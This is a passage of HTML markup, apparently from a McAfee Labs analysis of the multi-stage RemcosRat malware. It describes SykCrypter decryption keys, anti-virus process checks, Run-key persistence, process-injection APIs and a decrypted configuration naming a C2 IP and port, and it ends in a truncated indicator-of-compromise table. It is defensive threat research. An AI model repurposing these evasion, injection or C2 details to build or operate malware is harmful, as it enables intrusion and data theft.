https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture14-205x94.png 205w\" sizes=\"auto, (max-width: 1308px) 100vw, 1308px\" \/><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">14<\/span><\/i><i><span data-contrast=\"none\">: code for converting data to uppercase.<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The decryption loop issues the RC4 algorithm. The data decrypts a PE file<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\"> which is a DLL (Dynamic Link Library), loaded and executed using the \u2018<\/span><i><span data-contrast=\"auto\">NewLateBinding.LateGet()\u2019<\/span><\/i><span data-contrast=\"auto\"> method, passing the payload file (dGXsvRf.dll) as an argument as shown below.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\"> malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the <\/span><i><span data-contrast=\"auto\">\u2018NewLateBinding.LateGet()\u2019<\/span><\/i><span data-contrast=\"auto\"> function.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173309 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture15.png\" alt=\"\" width=\"1344\" height=\"696\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture15.png 1344w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture15-300x155.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture15-1024x530.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture15-768x398.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture15-205x106.png 205w\" sizes=\"auto, (max-width: 1344px) 100vw, 1344px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">15<\/span><\/i><i><span data-contrast=\"none\">: RC4 algorithm<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173323 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture16.png\" alt=\"\" width=\"1211\" height=\"706\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture16.png 1211w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture16-300x175.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture16-1024x597.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture16-768x448.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture16-205x120.png 205w\" sizes=\"auto, (max-width: 1211px) 100vw, 1211px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">16<\/span><\/i><i><span data-contrast=\"none\">: New instance created for decrypted dll<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><span data-contrast=\"auto\">Stage 5: Analysis of <\/span><\/b><b><span data-contrast=\"auto\">dGXsvRf.dll<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"none\">Decrypted DLL \u2018<\/span><i><span data-contrast=\"auto\">dGXsvRf.dll<\/span><\/i><span data-contrast=\"auto\">\u2019<\/span><span data-contrast=\"none\"> is the SykCrypter Trojan, using a resource named &#8220;SYKSBIKO&#8221; containing an encrypted payload.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173337 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture17.png\" alt=\"\" width=\"1150\" height=\"733\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture17.png 1150w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture17-300x191.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture17-1024x653.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture17-768x490.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture17-202x129.png 202w\" sizes=\"auto, (max-width: 1150px) 100vw, 1150px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">17<\/span><\/i><i><span data-contrast=\"none\">: Encrypted payload<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173351 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture18.png\" alt=\"\" width=\"1278\" height=\"431\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture18.png 1278w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture18-300x101.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture18-1024x345.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture18-768x259.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture18-205x69.png 205w\" sizes=\"auto, (max-width: 1278px) 100vw, 1278px\" \/><br \/>\n<\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">18<\/span><\/i><i><span data-contrast=\"none\">: SykCryptor Encrypted data<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. <\/span><span data-contrast=\"auto\">The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key \u201c<\/span><i><span data-contrast=\"auto\">uQExKBCIDisposablev<\/span><\/i><span data-contrast=\"auto\">\u201d.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173365 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture19.png\" alt=\"\" width=\"1324\" height=\"547\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture19.png 1324w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture19-300x124.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture19-1024x423.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture19-768x317.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture19-205x85.png 205w\" sizes=\"auto, (max-width: 1324px) 100vw, 1324px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">19<\/span><\/i><i><span data-contrast=\"none\">: RC4 Algorithm<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Another<\/span><span data-contrast=\"none\"> .NET dll with size 0x1200 and the method name, \u201cZlas1\u201d is used for deflation.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173379 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture20.png\" alt=\"\" width=\"1259\" height=\"532\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture20.png 1259w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture20-300x127.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture20-1024x433.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture20-768x325.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture20-205x87.png 205w\" sizes=\"auto, (max-width: 1259px) 100vw, 1259px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">20<\/span><\/i><i><span data-contrast=\"none\">: Loading DLL for deflation.<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The DLL then decrypts a list of various <\/span><span data-contrast=\"none\">security solution process names:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173393 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture21.png\" alt=\"\" width=\"861\" height=\"443\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture21.png 861w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture21-300x154.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture21-768x395.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture21-205x105.png 205w\" sizes=\"auto, (max-width: 861px) 100vw, 861px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">21<\/span><\/i><i><span data-contrast=\"none\">:Code for decrypting Security processes Names<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The decrypted list of process names include:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">vsserv<\/span> <span data-contrast=\"none\">bdservicehost<\/span> <span data-contrast=\"auto\">odscanui<\/span> <span data-contrast=\"auto\">bdagent\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">bullgaurd<\/span> <span data-contrast=\"auto\">BgScan <\/span> <span data-contrast=\"none\">BullGuardBhvScanner etc.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">The malware also drops acopy of itself in the %appdata% folder using cmd.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173407 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture22.png\" alt=\"\" width=\"1322\" height=\"801\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture22.png 1322w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture22-300x182.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture22-1024x620.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture22-768x465.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture22-205x124.png 205w\" sizes=\"auto, (max-width: 1322px) 100vw, 1322px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">22<\/span><\/i><i><span data-contrast=\"none\">: Copying file.<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h3><b><span data-contrast=\"none\">Persistence:<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p style=\"text-align: center;\"><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173421 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture23.png\" alt=\"\" width=\"1431\" height=\"548\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture23.png 1431w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture23-300x115.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture23-1024x392.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture23-768x294.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture23-205x79.png 205w\" sizes=\"auto, (max-width: 1431px) 100vw, 1431px\" \/><\/span><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">23<\/span><\/i><i><span data-contrast=\"none\">: Persistence Mechanism<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h3><b><span data-contrast=\"none\">Process Injection:<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">The SykCrypter Dll decrypts and loads a .NET file and calls its \u201cGetDelegateForFunctionPointer\u201d function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, <\/span><span data-contrast=\"none\">NtUnmapViewOfSection <\/span><span data-contrast=\"none\">and so on.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Then, finally it loads \u201cWriteProcessMemory,\u201d API which injects the decrypted payload into a process and call<\/span><span data-contrast=\"none\">s<\/span><span data-contrast=\"none\"> ResumeThread.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173435 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture24.png\" alt=\"\" width=\"1032\" height=\"315\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture24.png 1032w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture24-300x92.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture24-1024x313.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture24-768x234.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture24-205x63.png 205w\" sizes=\"auto, (max-width: 1032px) 100vw, 1032px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">24<\/span><\/i><i><span data-contrast=\"none\">: Process Injection<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><span data-contrast=\"auto\">Stage 6: Analysis of <\/span><\/b><b><span data-contrast=\"auto\">final payload<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"none\">The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p style=\"text-align: center;\"><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173449 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture25.png\" alt=\"\" width=\"832\" height=\"936\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture25.png 832w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture25-267x300.png 267w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture25-768x864.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture25-115x129.png 115w\" sizes=\"auto, (max-width: 832px) 100vw, 832px\" \/><\/span><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">25<\/span><\/i><i><span data-contrast=\"none\">: Strings in payload<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">T<\/span><span data-contrast=\"none\">he configuration file of Remcos is present in RCData \u201cSETTINGS\u201c, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"> <img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173463 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture26.png\" alt=\"\" width=\"973\" height=\"519\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture26.png 973w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture26-300x160.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture26-768x410.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture26-205x109.png 205w\" sizes=\"auto, (max-width: 973px) 100vw, 973px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">26<\/span><\/i><i><span data-contrast=\"none\">: RC4 encrypted configuration file<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Decrypted Configuration:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p style=\"text-align: center;\"><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-173477 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27.png\" alt=\"\" width=\"827\" height=\"834\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27.png 827w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27-297x300.png 297w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27-150x150.png 150w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27-768x775.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27-128x129.png 128w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27-24x24.png 24w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27-48x48.png 48w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/08\/Picture27-96x96.png 96w\" sizes=\"auto, (max-width: 827px) 100vw, 827px\" \/>\u00a0<\/span><i><span data-contrast=\"none\">Figure <\/span><\/i><i><span data-contrast=\"none\">27<\/span><\/i><i><span data-contrast=\"none\">: Decrypted configuration<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<h3><b><span data-contrast=\"none\">Conclusion:<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">RemcosRat<\/span><span data-contrast=\"none\"> is a complex multi-stage threat. McAfee<\/span><span data-contrast=\"none\"> Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. <\/span><span data-contrast=\"none\">At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h3><b><span data-contrast=\"none\">Indicators of Compromise (IOCs):\u202f<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h3>\n<table data-tablestyle=\"MsoTableGrid\" data-tablelook=\"1184\" aria-rowcount=\"6\">\n<tbody>\n<tr aria-rowindex=\"1\">\n<td data-celllook=\"0\"><span data-contrast=\"auto\">SHA256<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<td data-celllook=\"0\"><span data-contrast=\"auto\">Filetype<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<\/tr>\n<tr aria-rowindex=\"2\">\n<td data-celllook=\"0\"><span data-contrast=\"auto\">0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<td data-celllook=\"0\"><span data-contrast=\"auto\">VBS<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<\/tr>\n<tr aria-rowindex=\"3\">\n<td data-celllook=\"0\"><span data-contrast=\"auto\">3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<td data-celllook=\"0\"><span data-contrast=\"auto\">PowerShell<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<\/tr>\n<tr aria-rowindex=\"4\">\n<td data-celllook=\"0\"><span data-contrast=\"auto\">1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/td>\n<td data-celllook=\"0\"><span data-contrast=\"auto\">MSIL loader<\/span><span 